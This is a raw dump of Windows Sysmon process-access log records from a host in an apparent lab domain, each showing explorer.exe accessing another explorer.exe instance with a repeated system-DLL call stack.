22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.145{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 